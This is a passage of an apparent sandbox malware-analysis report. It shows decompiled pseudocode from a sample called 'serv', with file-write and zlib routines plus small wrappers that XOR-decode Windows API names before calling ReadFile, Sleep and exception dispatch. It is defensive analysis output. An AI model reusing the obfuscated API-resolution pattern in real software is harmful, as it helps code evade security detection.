                                                                    				long _t76;
                                                                    				signed int _t81;
                                                                    				char* _t86;
                                                                    				long _t93;
                                                                    				intOrPtr* _t100;
                                                                    				void* _t102;
                                                                    				void* _t107;
                                                                    				char _t110;
                                                                    				struct _OVERLAPPED* _t112;
                                                                    				long _t115;
                                                                    				signed int _t118;
                                                                    				struct _OVERLAPPED* _t120;
                                                                    				void* _t121;
                                                                    				void* _t123;
                                                                    
                                                                    				_t121 = _t123 - 0x3a0;
                                                                    				_t68 =  *0x446f24; // 0x81a0b55c
                                                                    				_t112 = 0;
                                                                    				 *((intOrPtr*)(_t121 + 0x39c)) = _t68;
                                                                    				 *(_t121 - 0x78) = 0;
                                                                    				 *((intOrPtr*)(_t121 - 0x7c)) = 0;
                                                                    				if( *(_t121 + 0x3b0) != 0) {
                                                                    					_t100 = 0x44b140 + ( *(_t121 + 0x3a8) >> 5) * 4;
                                                                    					_t118 = ( *(_t121 + 0x3a8) & 0x0000001f) + ( *(_t121 + 0x3a8) & 0x0000001f) * 8 << 2;
                                                                    					if(( *( *_t100 + _t118 + 4) & 0x00000020) != 0) {
                                                                    						E00429D9C(_t102,  *(_t121 + 0x3a8), 0, 0, 2);
                                                                    					}
                                                                    					_t73 =  *_t100 + _t118;
                                                                    					if((_t73[1] & 0x00000080) == 0) {
                                                                    						_t74 = WriteFile( *_t73,  *(_t121 + 0x3ac),  *(_t121 + 0x3b0), _t121 - 0x80, _t112); // executed
                                                                    						if(_t74 == 0) {
                                                                    							 *(_t121 - 0x6c) = GetLastError();
                                                                    						} else {
                                                                    							 *(_t121 - 0x6c) = _t112;
                                                                    							 *(_t121 - 0x78) =  *(_t121 - 0x80);
                                                                    						}
                                                                    					} else {
                                                                    						 *(_t121 - 0x74) =  *(_t121 + 0x3ac);
                                                                    						 *(_t121 - 0x6c) = _t112;
                                                                    						if( *(_t121 + 0x3b0) <= _t112) {
                                                                    							L25:
                                                                    							if(( *( *_t100 + _t118 + 4) & 0x00000040) == 0 ||  *( *(_t121 + 0x3ac)) != 0x1a) {
                                                                    								 *((intOrPtr*)(E00426856())) = 0x1c;
                                                                    								_t81 = E0042685F();
                                                                    								 *_t81 = _t112;
                                                                    								L29:
                                                                    								_t77 = _t81 | 0xffffffff;
                                                                    								goto L31;
                                                                    							} else {
                                                                    								_t77 = 0;
                                                                    								L31:
                                                                    								goto L32;
                                                                    							}
                                                                    						} else {
                                                                    							goto L6;
                                                                    						}
                                                                    						do {
                                                                    							L6:
                                                                    							_t107 =  *(_t121 - 0x74) -  *(_t121 + 0x3ac);
                                                                    							_t86 = _t121 - 0x68;
                                                                    							 *(_t121 - 0x70) = _t112;
                                                                    							while(_t107 <  *(_t121 + 0x3b0)) {
                                                                    								 *(_t121 - 0x74) =  *(_t121 - 0x74) + 1;
                                                                    								_t110 =  *( *(_t121 - 0x74));
                                                                    								_t107 = _t107 + 1;
                                                                    								if(_t110 == 0xa) {
                                                                    									 *((intOrPtr*)(_t121 - 0x7c)) =  *((intOrPtr*)(_t121 - 0x7c)) + 1;
                                                                    									 *_t86 = 0xd;
                                                                    									_t86 = _t86 + 1;
                                                                    									 *(_t121 - 0x70) =  &( *(_t121 - 0x70)->Internal);
                                                                    								}
                                                                    								 *_t86 = _t110;
                                                                    								_t86 = _t86 + 1;
                                                                    								 *(_t121 - 0x70) =  &( *(_t121 - 0x70)->Internal);
                                                                    								if( *(_t121 - 0x70) < 0x400) {
                                                                    									continue;
                                                                    								} else {
                                                                    									break;
                                                                    								}
                                                                    							}
                                                                    							_t115 = _t86 - _t121 - 0x68;
                                                                    							if(WriteFile( *( *_t100 + _t118), _t121 - 0x68, _t115, _t121 - 0x80, 0) == 0) {
                                                                    								 *(_t121 - 0x6c) = GetLastError();
                                                                    								L16:
                                                                    								_t112 = 0;
                                                                    								L17:
                                                                    								_t76 =  *(_t121 - 0x78);
                                                                    								if(_t76 != _t112) {
                                                                    									_t77 = _t76 -  *((intOrPtr*)(_t121 - 0x7c));
                                                                    									goto L31;
                                                                    								}
                                                                    								if( *(_t121 - 0x6c) == _t112) {
                                                                    									goto L25;
                                                                    								}
                                                                    								_t120 = 5;
                                                                    								if( *(_t121 - 0x6c) != _t120) {
                                                                    									_t81 = E00426868( *(_t121 - 0x6c));
                                                                    								} else {
                                                                    									 *((intOrPtr*)(E00426856())) = 9;
                                                                    									_t81 = E0042685F();
                                                                    									 *_t81 = _t120;
                                                                    								}
                                                                    								goto L29;
                                                                    							}
                                                                    							_t93 =  *(_t121 - 0x80);
                                                                    							 *(_t121 - 0x78) =  *(_t121 - 0x78) + _t93;
                                                                    							if(_t93 < _t115) {
                                                                    								goto L16;
                                                                    							}
                                                                    							_t112 = 0;
                                                                    						} while ( *(_t121 - 0x74) -  *(_t121 + 0x3ac) <  *(_t121 + 0x3b0));
                                                                    					}
                                                                    					goto L17;
                                                                    				} else {
                                                                    					_t77 = 0;
                                                                    					L32:
                                                                    					return E00428381(_t77,  *((intOrPtr*)(_t121 + 0x39c)));
                                                                    				}
                                                                    			}




















                                                                    0x004285f0
                                                                    0x004285fd
                                                                    0x00428603
                                                                    0x0042860b
                                                                    0x00428611
                                                                    0x00428614
                                                                    0x00428617
                                                                    0x00428637
                                                                    0x00428640
                                                                    0x00428648
                                                                    0x00428654
                                                                    0x00428659
                                                                    0x0042865e
                                                                    0x00428664
                                                                    0x0042874a
                                                                    0x00428752
                                                                    0x00428765
                                                                    0x00428754
                                                                    0x00428757
                                                                    0x0042875a
                                                                    0x0042875a
                                                                    0x0042866a
                                                                    0x00428676
                                                                    0x00428679
                                                                    0x0042867c
                                                                    0x00428775
                                                                    0x0042877c
                                                                    0x00428792
                                                                    0x00428798
                                                                    0x0042879d
                                                                    0x0042879f
                                                                    0x0042879f
                                                                    0x00000000
                                                                    0x00428789
                                                                    0x00428789
                                                                    0x004287a7
                                                                    0x00000000
                                                                    0x004287a8
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00428682
                                                                    0x00428682
                                                                    0x00428685
                                                                    0x0042868b
                                                                    0x0042868e
                                                                    0x00428691
                                                                    0x0042869c
                                                                    0x0042869f
                                                                    0x004286a1
                                                                    0x004286a5
                                                                    0x004286a7
                                                                    0x004286aa
                                                                    0x004286ad
                                                                    0x004286ae
                                                                    0x004286ae
                                                                    0x004286b1
                                                                    0x004286b3
                                                                    0x004286b4
                                                                    0x004286be
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004286be
                                                                    0x004286c5
                                                                    0x004286df
                                                                    0x00428706
                                                                    0x00428709
                                                                    0x00428709
                                                                    0x0042870b
                                                                    0x0042870b
                                                                    0x00428710
                                                                    0x004287a4
                                                                    0x00000000
                                                                    0x004287a4
                                                                    0x00428719
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0042871d
                                                                    0x00428721
                                                                    0x0042876d
                                                                    0x00428723
                                                                    0x00428728
                                                                    0x0042872e
                                                                    0x00428733
                                                                    0x00428733
                                                                    0x00000000
                                                                    0x00428721
                                                                    0x004286e1
                                                                    0x004286e4
                                                                    0x004286e9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004286f4
                                                                    0x004286f6
                                                                    0x004286fe
                                                                    0x00000000
                                                                    0x00428619
                                                                    0x00428619
                                                                    0x004287a9
                                                                    0x004287bc
                                                                    0x004287bc

                                                                    APIs
                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,00000001), ref: 004286D7
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite
                                                                    • String ID:
                                                                    • API String ID: 3934441357-0
                                                                    • Opcode ID: c651b748de8c02b432e9e48a99f3892e0b7ed912375aff4773dff9f2ec1294d3
                                                                    • Instruction ID: 6add02fa8679b5ffe0ebb94416e3f167464424fb96d28161fdbe8f36a556be5b
                                                                    • Opcode Fuzzy Hash: c651b748de8c02b432e9e48a99f3892e0b7ed912375aff4773dff9f2ec1294d3
                                                                    • Instruction Fuzzy Hash: 13516E31A01268CFDB22DFA9EC84ADDBBB9FF85344F61011EE8599B252DB345A01CF15
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 96%
                                                                    			E0042BEA0(signed int __eax, void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				void* __ebp;
                                                                    				signed int _t44;
                                                                    				signed int _t48;
                                                                    				signed int _t63;
                                                                    				signed int _t66;
                                                                    				signed int _t68;
                                                                    				intOrPtr _t70;
                                                                    				signed char _t74;
                                                                    				signed char _t76;
                                                                    				signed int _t94;
                                                                    				intOrPtr _t95;
                                                                    				void* _t96;
                                                                    				void* _t97;
                                                                    				void* _t98;
                                                                    
                                                                    				_t44 = __eax;
                                                                    				_t95 = _a4;
                                                                    				if( *((intOrPtr*)(_t95 + 0x84)) == 0) {
                                                                    					__eflags =  *(_t95 + 0x80);
                                                                    					if( *(_t95 + 0x80) == 0) {
                                                                    						E004282F0(_t95 + 0x30, 0, 0x38);
                                                                    						E0042B7FA(_t95);
                                                                    						_t48 =  *(_t95 + 0x24);
                                                                    						_t74 =  *0x448626; // 0x60
                                                                    						_t98 = _t97 + 0x10;
                                                                    						__eflags = _t48 - ( *(_t95 + 0x1a) & 0x0000ffff);
                                                                    						if(__eflags == 0) {
                                                                    							_t68 = _t48 + 0x20;
                                                                    							 *(_t95 + 0x24) = _t68;
                                                                    							_push(_t68 * 0x38);
                                                                    							_push( *((intOrPtr*)(_t95 + 0x7c)));
                                                                    							_t70 = E004251E9(_t74, 0, _t95, __eflags);
                                                                    							__eflags = ( *(_t95 + 0x1a) & 0x0000ffff) * 0x38 + _t70;
                                                                    							 *((intOrPtr*)(_t95 + 0x7c)) = _t70;
                                                                    							E004282F0(( *(_t95 + 0x1a) & 0x0000ffff) * 0x38 + _t70, 0, 0x700);
                                                                    							_t98 = _t98 + 0x14;
                                                                    						}
                                                                    						_t94 = ( *(_t95 + 0x1a) & 0x0000ffff) * 0x38 +  *((intOrPtr*)(_t95 + 0x7c));
                                                                    						 *(_t95 + 0x1a) = 1;
                                                                    						 *((intOrPtr*)(_t94 + 0x28)) = E00422EEB(E00422F20(_a8) + 1);
                                                                    						 *((intOrPtr*)(_t94 + 0x24)) = E0042B7BD(_t95);
                                                                    						E00423FB0( *((intOrPtr*)(_t94 + 0x28)), _a8);
                                                                    						 *(_t95 + 0x80) = _t94;
                                                                    						_t76 = _t74 + (_t74 ^ 0x00000064) * 0x16 + (_t74 + (_t74 ^ 0x00000064) * 0x00000016 ^ 0x0000007e) * 0x16;
                                                                    						_t63 = E0042BCE8(0x16, _t94, _a12);
                                                                    						__eflags = _t63;
                                                                    						if(__eflags == 0) {
                                                                    							 *(_t95 + 0x28) =  *(_t95 + 0x28) & 0x00000000;
                                                                    							E0042C11A(_t76, 0x16, _t96, __eflags, _t95, _t94);
                                                                    							 *0x448627 =  *0x448627 & _t76;
                                                                    							 *((intOrPtr*)(_t95 + 0x40)) =  *((intOrPtr*)(_t95 + 0x74));
                                                                    							 *((intOrPtr*)(_t95 + 0x6c)) = 0;
                                                                    							 *((intOrPtr*)(_t95 + 0x34)) = 0;
                                                                    							 *((intOrPtr*)(_t95 + 0x3c)) =  *((intOrPtr*)(_t95 + 0x78));
                                                                    							 *((intOrPtr*)(_t95 + 0x38)) = 0;
                                                                    							 *((intOrPtr*)(_t95 + 0x44)) = 0;
                                                                    							__eflags =  *((short*)(_t94 + 0xa)) - 8;
                                                                    							if( *((short*)(_t94 + 0xa)) != 8) {
                                                                    								L11:
                                                                    								__eflags =  *0x448626 - 0x3a;
                                                                    								if( *0x448626 >= 0x3a) {
                                                                    									 *0x448626 =  *0x448626 ^ 0x00000014;
                                                                    									__eflags =  *0x448626;
                                                                    								} else {
                                                                    									 *0x448626 =  *0x448626 | 0x00000074;
                                                                    								}
                                                                    								 *((char*)(_t95 + 0x2c)) = 1;
                                                                    								_t66 = 0;
                                                                    								__eflags = 0;
                                                                    								goto L15;
                                                                    							}
                                                                    							 *((intOrPtr*)(_t95 + 0x58)) = 0;
                                                                    							_t63 = E0042DAB9(_t95 + 0x30, _a12, 8, 0xfffffff1, 8, 0, "1.2.3", 0x38); // executed
                                                                    							__eflags = _t63;
                                                                    							if(_t63 != 0) {
                                                                    								goto L8;
                                                                    							}
                                                                    							goto L11;
                                                                    						} else {
                                                                    							L8:
                                                                    							_t66 = _t63 | 0xffffffff;
                                                                    							L15:
                                                                    							return _t66;
                                                                    						}
                                                                    					}
                                                                    					 *0x448604 = 2;
                                                                    					L4:
                                                                    					return _t44 | 0xffffffff;
                                                                    				}
                                                                    				 *0x448604 = 5;
                                                                    				goto L4;
                                                                    			}




















                                                                    0x0042bea0
                                                                    0x0042bea4
                                                                    0x0042beb0
                                                                    0x0042bebe
                                                                    0x0042bec4
                                                                    0x0042bee0
                                                                    0x0042bee6
                                                                    0x0042beef
                                                                    0x0042bef2
                                                                    0x0042bef8
                                                                    0x0042befb
                                                                    0x0042befd
                                                                    0x0042beff
                                                                    0x0042bf02
                                                                    0x0042bf08
                                                                    0x0042bf09
                                                                    0x0042bf0c
                                                                    0x0042bf1d
                                                                    0x0042bf21
                                                                    0x0042bf24
                                                                    0x0042bf29
                                                                    0x0042bf29
                                                                    0x0042bf46
                                                                    0x0042bf4a
                                                                    0x0042bf5b
                                                                    0x0042bf66
                                                                    0x0042bf6c
                                                                    0x0042bf7e
                                                                    0x0042bf84
                                                                    0x0042bf86
                                                                    0x0042bf8e
                                                                    0x0042bf90
                                                                    0x0042bf97
                                                                    0x0042bf9d
                                                                    0x0042bfa2
                                                                    0x0042bfaf
                                                                    0x0042bfb5
                                                                    0x0042bfb8
                                                                    0x0042bfbb
                                                                    0x0042bfbe
                                                                    0x0042bfc1
                                                                    0x0042bfc4
                                                                    0x0042bfc9
                                                                    0x0042bfef
                                                                    0x0042bfef
                                                                    0x0042bff6
                                                                    0x0042c001
                                                                    0x0042c001
                                                                    0x0042bff8
                                                                    0x0042bff8
                                                                    0x0042bff8
                                                                    0x0042c008
                                                                    0x0042c00c
                                                                    0x0042c00c
                                                                    0x00000000
                                                                    0x0042c00c
                                                                    0x0042bfdc
                                                                    0x0042bfe3
                                                                    0x0042bfeb
                                                                    0x0042bfed
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0042bf92
                                                                    0x0042bf92
                                                                    0x0042bf92
                                                                    0x0042c00e
                                                                    0x00000000
                                                                    0x0042c00e
                                                                    0x0042bf90
                                                                    0x0042bec6
                                                                    0x0042bed0
                                                                    0x00000000
                                                                    0x0042bed0
                                                                    0x0042beb2
                                                                    0x00000000

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: _strcat_strlen
                                                                    • String ID: 1.2.3
                                                                    • API String ID: 432593777-2310465506
                                                                    • Opcode ID: c4dedc8d02f874d90a66fce8caa90ed0770ead4202f9a3e7d344dcebc81321ce
                                                                    • Instruction ID: c2d0d4684f155b5402b699925cecf65e3905680253f6fd2c79c4331609b03b13
                                                                    • Opcode Fuzzy Hash: c4dedc8d02f874d90a66fce8caa90ed0770ead4202f9a3e7d344dcebc81321ce
                                                                    • Instruction Fuzzy Hash: A141E471A04B50AED7609F35AD01B67BBE8FB19314F41492FE496C2691EB78E004CB5D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0041B3F0(void* _a4, void* _a8, long _a12, DWORD* _a16, struct _OVERLAPPED* _a20) {
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				int _t17;
                                                                    				void* _t19;
                                                                    				CHAR* _t27;
                                                                    
                                                                    				if( *0x447e54 == 0) {
                                                                    					_v11 = 5;
                                                                    					_v5 = 5;
                                                                    					 *_t27 = 0x32;
                                                                    					_v10 = 1;
                                                                    					_v9 = 4;
                                                                    					_v8 = 0x26;
                                                                    					_v7 = 9;
                                                                    					_v6 = 0xc;
                                                                    					_v4 = 0x60;
                                                                    					_t19 = 0;
                                                                    					do {
                                                                    						 *(_t27 + _t19) =  *(_t27 + _t19) ^ 0x00000060;
                                                                    						_t19 = _t19 + 1;
                                                                    					} while (_t19 < 9);
                                                                    					 *0x447e54 = E0041A600(_t27);
                                                                    				}
                                                                    				_t17 = ReadFile(_a4, _a8, _a12, _a16, _a20); // executed
                                                                    				return _t17;
                                                                    			}














                                                                    0x0041b3fa
                                                                    0x0041b3fe
                                                                    0x0041b402
                                                                    0x0041b406
                                                                    0x0041b40a
                                                                    0x0041b40f
                                                                    0x0041b414
                                                                    0x0041b419
                                                                    0x0041b41e
                                                                    0x0041b423
                                                                    0x0041b428
                                                                    0x0041b430
                                                                    0x0041b430
                                                                    0x0041b434
                                                                    0x0041b435
                                                                    0x0041b446
                                                                    0x0041b446
                                                                    0x0041b464
                                                                    0x0041b469

                                                                    APIs
                                                                    • ReadFile.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0041B464
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID: &$`
                                                                    • API String ID: 2738559852-2145084350
                                                                    • Opcode ID: bdc96b1ec9894d49157d80569ca01b516950cee4dbdfb481f2c0e3db89f4cff6
                                                                    • Instruction ID: b893af8124a6af6723b5d8156e945cbc3e6634095fd3d5a9478a756de87d527b
                                                                    • Opcode Fuzzy Hash: bdc96b1ec9894d49157d80569ca01b516950cee4dbdfb481f2c0e3db89f4cff6
                                                                    • Instruction Fuzzy Hash: 7B015A7100C3C09ED305DBA8D548B4BBBE5ABEA308F08C9ADE4D887242D779D909C767
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 93%
                                                                    			E0041AD50(struct _EXCEPTION_RECORD _a4, CONTEXT* _a8, intOrPtr _a12) {
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				intOrPtr _t14;
                                                                    				void* _t16;
                                                                    				CHAR* _t21;
                                                                    
                                                                    				_t14 =  *0x447df8;
                                                                    				if(_t14 == 0) {
                                                                    					_v11 = 0xc;
                                                                    					_v6 = 0xc;
                                                                    					_v5 = 0xc;
                                                                    					 *_t21 = 0x21;
                                                                    					_v10 = 8;
                                                                    					_v9 = 0x19;
                                                                    					_v8 = 0x2f;
                                                                    					_v7 = 0x1b;
                                                                    					_v4 = 0x69;
                                                                    					_t16 = 0;
                                                                    					do {
                                                                    						 *(_t21 + _t16) =  *(_t21 + _t16) ^ 0x00000069;
                                                                    						_t16 = _t16 + 1;
                                                                    					} while (_t16 < 9);
                                                                    					_t14 = E0041A600(_t21);
                                                                    					 *0x447df8 = _t14;
                                                                    				}
                                                                    				_push(_a12);
                                                                    				KiUserExceptionDispatcher(_a4, _a8); // executed
                                                                    				return _t14;
                                                                    			}














                                                                    0x0041ad50
                                                                    0x0041ad5a
                                                                    0x0041ad5e
                                                                    0x0041ad62
                                                                    0x0041ad66
                                                                    0x0041ad6a
                                                                    0x0041ad6e
                                                                    0x0041ad73
                                                                    0x0041ad78
                                                                    0x0041ad7d
                                                                    0x0041ad82
                                                                    0x0041ad87
                                                                    0x0041ad90
                                                                    0x0041ad90
                                                                    0x0041ad94
                                                                    0x0041ad95
                                                                    0x0041ad9e
                                                                    0x0041ada6
                                                                    0x0041ada6
                                                                    0x0041adb3
                                                                    0x0041adba
                                                                    0x0041adbf

                                                                    APIs
                                                                    • KiUserExceptionDispatcher.NTDLL(?,?,?,00447B7C,?,00447B7C,?,?,?,?,?,00000001), ref: 0041ADBA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: DispatcherExceptionUser
                                                                    • String ID: /$i
                                                                    • API String ID: 6842923-165077141
                                                                    • Opcode ID: 037d464677c18427fb23a018a43f7fe41e788ca8b19b5b3bda548f3a828354cd
                                                                    • Instruction ID: 5f8f36b2009e2029b5f36b40d95dfb93659a5cc51bc1b85cb30016ec5b9d2c72
                                                                    • Opcode Fuzzy Hash: 037d464677c18427fb23a018a43f7fe41e788ca8b19b5b3bda548f3a828354cd
                                                                    • Instruction Fuzzy Hash: 0F014B7151C3819ED302DB68A448B9BBFE55FE6304F04C86DE4D987242D279C559C323
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0041B960(long _a4) {
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				intOrPtr _t9;
                                                                    				void* _t11;
                                                                    				CHAR* _t14;
                                                                    
                                                                    				_t9 =  *0x447e88;
                                                                    				if(_t9 == 0) {
                                                                    					_v6 = 0x71;
                                                                    					_v5 = 0x71;
                                                                    					 *_t14 = 0x47;
                                                                    					_v7 = 0x78;
                                                                    					_v4 = 0x64;
                                                                    					_v3 = 0x14;
                                                                    					_t11 = 0;
                                                                    					do {
                                                                    						 *(_t14 + _t11) =  *(_t14 + _t11) ^ 0x00000014;
                                                                    						_t11 = _t11 + 1;
                                                                    					} while (_t11 < 6);
                                                                    					_t9 = E0041A600(_t14);
                                                                    					 *0x447e88 = _t9;
                                                                    				}
                                                                    				Sleep(_a4); // executed
                                                                    				return _t9;
                                                                    			}











                                                                    0x0041b960
                                                                    0x0041b96a
                                                                    0x0041b96e
                                                                    0x0041b972
                                                                    0x0041b976
                                                                    0x0041b97a
                                                                    0x0041b97f
                                                                    0x0041b984
                                                                    0x0041b989
                                                                    0x0041b990
                                                                    0x0041b990
                                                                    0x0041b994
                                                                    0x0041b995
                                                                    0x0041b99e
                                                                    0x0041b9a6
                                                                    0x0041b9a6
                                                                    0x0041b9b0
                                                                    0x0041b9b5

                                                                    APIs
                                                                    • Sleep.KERNELBASE(?,?,?,?,?,?,?,00000104), ref: 0041B9B0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID: d$x
                                                                    • API String ID: 3472027048-531210822
                                                                    • Opcode ID: ee0d4f09885f70456ac8cd8f60f06c65684e9d010646519dd204ac788d1fd695
                                                                    • Instruction ID: 02dd5fde26803881f1f3cc2860341572ba122ad1133bb83be129c40d07be4229
                                                                    • Opcode Fuzzy Hash: ee0d4f09885f70456ac8cd8f60f06c65684e9d010646519dd204ac788d1fd695
                                                                    • Instruction Fuzzy Hash: 38F05EB641C3C09DD341E778984568BBBD45BA6304F19886DD5D9C7212E37DC44AD337
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 37%
                                                                    			E0041DC80(intOrPtr _a4) {
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				intOrPtr* _t17;
                                                                    				void* _t18;
                                                                    				void* _t20;
                                                                    				CHAR* _t24;
                                                                    
                                                                    				_t17 =  *0x447fc0;
                                                                    				if(_t17 == 0) {
                                                                    					 *_t24 = _t17;
                                                                    					_v14 = 0x13;
                                                                    					_v10 = 0x13;
                                                                    					_v15 = 2;
                                                                    					_v13 = 0xf;
                                                                    					_v12 = 8;
                                                                    					_v11 = 0x14;
                                                                    					_v9 = 5;
                                                                    					_v8 = 0x1e;
                                                                    					_v7 = 9;
                                                                    					_v6 = 6;
                                                                    					_v5 = 0xa;
                                                                    					_v4 = 2;
                                                                    					_v3 = 0x67;
                                                                    					_t20 = 0;
                                                                    					do {
                                                                    						 *(_t24 + _t20) =  *(_t24 + _t20) ^ 0x00000067;
                                                                    						_t20 = _t20 + 1;
                                                                    					} while (_t20 < 0xe);
                                                                    					_t17 = E0041DA50(_t24);
                                                                    					 *0x447fc0 = _t17;
                                                                    				}
                                                                    				_t18 =  *_t17(_a4); // executed
                                                                    				return _t18;
                                                                    			}




















                                                                    0x0041dc80
                                                                    0x0041dc8a
                                                                    0x0041dc8c
                                                                    0x0041dc93
                                                                    0x0041dc97
                                                                    0x0041dc9b
                                                                    0x0041dc9f
                                                                    0x0041dca4
                                                                    0x0041dca9
                                                                    0x0041dcae
                                                                    0x0041dcb3
                                                                    0x0041dcb8
